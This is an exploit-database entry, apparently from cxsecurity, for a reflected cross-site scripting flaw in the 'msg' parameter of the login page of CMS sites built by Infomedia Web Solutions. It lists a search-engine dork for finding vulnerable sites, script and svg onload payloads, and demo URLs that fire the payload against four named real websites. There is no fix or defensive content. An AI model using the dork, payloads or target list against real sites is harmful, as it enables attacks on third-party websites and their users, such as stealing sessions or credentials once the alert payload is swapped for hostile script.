Infomedia Web Solutions Cross Site Scripting

2020.06.02
id Xmall75 (ID) id
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Developed by: Infomedia Web Solutions"

# Exploit Title : Infomedia Web Solutions - Cross Site Scripting # Author : Xmall75 # Vendor Homepage : infomediawebsolutions.com # Date : 6 June 2020 # Tested on : Windows # Dork : intext:"Developed by: Infomedia Web Solutions" inurl:/cms/login.php?msg= # Payload : <script>alert("Xmall75");</script> <svg onload=alert("Xmall75")> and other payloads. # XSS : site.com/cms/login.php?msg=[your payload here] # Demo : www.inclusivefinanceindia.org/cms/login.php?msg=<script>alert("Xmall75");</script> www.surekhasadana.com/cms/login.php?msg=<script>alert("Xmall75");</script> selflesslyyours.org/http:/cms/login.php?msg=<script>alert("Xmall75");</script> www.dailypioneer.com/cms/login.php?msg=<script>alert("Xmall75");</script> # xmall75.id@gmail.com


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top